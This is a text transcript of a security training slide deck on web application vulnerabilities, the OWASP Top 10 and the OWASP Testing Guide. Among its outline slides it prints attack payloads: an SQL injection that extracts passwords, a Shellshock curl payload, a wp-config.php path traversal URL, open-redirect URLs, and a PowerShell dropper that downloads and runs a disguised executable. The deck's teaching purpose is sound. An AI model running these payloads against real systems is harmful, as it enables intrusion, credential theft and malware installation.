Web Application Security and OWASP Testing Guide Web Application Security...Web Application Security...

Ammarit Thongthua, CISSP CISM GXPN

Web Application Security

and

OWASP Testing Guide

# Who am I

Risk Advisory Manager (DELOITTE)Penetration TesterSecurity Consultant

Web Security ?

Where is our system Weak Points ?

Operating System

Web ServerDatabase

Framework / CMS

Web Application / Web Service

Plug-in

Attack Surfaces

OWASP Top 10

Vulnerability

Low Hanging Fruit

Injection

Low Hanging Fruits

• injection

• SQL injection

1/1/1 UNION SELECT 1,username,password,4 FROM USERS;--

Low Hanging Fruits

• SQL injection

• LDAP injection

• XPATH injection

• Command injection

• Code injection

• Ex:

• AJAX

• JSON ***

Low Hanging Fruits

powershell "Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;

Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;

Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;

Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;

Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;

(New-Object

System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindo

ws/c5675e0b/dd.exe','dd.exe');

(New-Object System.Net.WebClient).DownloadFile

('http://img1.imagehousing.com/0/art-297435.jpg','favicon.jpg');

(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg

of=svchost.exe skip=2931 bs=1');

Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');"

Low Hanging Fruits

http://www.victim.com?cmd=

Command injection

Low Hanging Fruits

• Directory Listing

Low Hanging Fruits

• XSS

Just POP UP ?

Low Hanging Fruits

• Insecure Direct Object Reference

Low Hanging Fruits

• Local/Remote File Inclusion

Low Hanging Fruits

• Directory traversal

Low Hanging Fruits

• Missing Function Level Access Control

Weak Credential

Low Hanging Fruits

Malicious File Upload

Low Hanging Fruits

Malicious File Upload

Low Hanging Fruits

- HTTP PUT

- File upload feature

- Weak CMS admin password

- Platform vulnerability

- RCE

- Authentication bypass

- Log file + LFI

Inappropriate password handling

Low Hanging Fruits

• Temp File, Back Up test trick

– Path + .zip , .rar , .bak

– Ex; /admin –

• http://testsite.com/admin.zip

• http://testsite.com/admin.rar

• http://testsite.com/admin.bak

Low Hanging Fruits

• With Dirbuster

Low Hanging Fruits

• Autocomplete

Low Hanging Fruits

Sensitive Information Leakage : Miss-Configuration ( EX: info.php)

Low Hanging Fruits

Sensitive Information Leakage : Error Message

Low Hanging Fruits

Ref: https://securenetworkmanagement.com/shellshock-simple-user-agent-exploit/

Using Components with Known Vulnerabilities

Shellshock

curl http://cgi-bin/service/index.cgi" --insecure -H "User-Agent: () { :; }; /bin/bash

‘ping 192.168.30.54 –c 10’"

Low Hanging Fruits

• IIS

https://www.youtube.com/watch?v=vw4JFKZ3lS0

MS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635 )


Low Hanging Fruits

http://blog.trendmicro.com/trendlabs-security-intelligence/iis-at-risk-an-in-depth-look-into-cve-2015-1635/

• IISMS15-034: Vulnerability in HTTP.sys Could Allow RCE (CVE-2015-1635 )

Information leakage


Low Hanging Fruits

• OpenSSL

Heartbleed (CVE-2014-0160)

• Abuse SSL Heartbeat communication to get

more data in the server memory.

• Email, instant messaging (IM) , VPN and

Web.

• OpenSSL 1.0.1 through 1.0.1f (inclusive) are

vulnerable

http://heartbleed.com/


Low Hanging Fruits

https://www.baagames.com/2014/04/steam-heartbreed/


Low Hanging Fruits

Operating System

Database

Framework / CMS

Web Application / Web Service

Plug-in

Web Server Platform

CMS + Database Mgn web

Components


Low Hanging Fruits


Low Hanging Fruits

https://www.youtube.com/watch?v=zSva2UPwKvoAnon Joker


Low Hanging Fruits


Low Hanging Fruits

http://the.victim.com/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php

Connect to Database


Low Hanging Fruits

Unvalidated Redirects and Forwards

Low Hanging Fruits

https://your.bank.com/?url=http://hacker.site.com


Low Hanging Fruits

https://your.bank.com/?url=%68%74%74%70%3a%2f%2f%68%

61%63%6b%65%72%2e%73%69%74%65%2e%63%6f%6d


Low Hanging Fruits

Testing for Client Side URL Redirect (OTG-CLIENT-004)


Low Hanging Fruits


Low Hanging Fruits

../../ /


Low Hanging Fruits

https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools

• Automatic Scan

Low Hanging Fruits

• Automatic Scan

Low Hanging Fruits

Unfortunately, 20 % of vulnerabilitiescannot be discovered by tools

• Some type of insecure direct object references

• Miss Function access control

• Business logic

– Step/Flow

– Stage

– Limit

Vulnerability cannot

discovered by tools

OWASP Top 10

Penetration Testing

TOR / RFP ?

Test to cover “Beyond Low Hanging Fruits”

https://www.owasp.org/images/1/19/OTGv4.pdf

OWASP Testing GuideInfomation Gathering

Configuration and Deployment Management Testing

Identity Management Testing

Authentication Testing

Authorization Testing

Session Management Testing

Input Validation Testing

Test for Error Handling

Test for Weak Cryptography

Business Logic Testing

Client Side Testing

OWASP Testing Guide

Weak Cipher suite

OWASP Testing Guide

A

B

A A A

Tested on 21 August 2016

A+

A A

A+

B

A A

Weak Cipher suite

OWASP Testing Guide

https://www.ssllabs.com/ssltest/

Weak Cipher suite

OWASP Testing Guide

OWASP Testing Guide

Web Application Security and OWASP Testing Guide Web Application Security...Web Application Security...

Documents

Transcript of Web Application Security and OWASP Testing Guide Web Application Security...Web Application Security...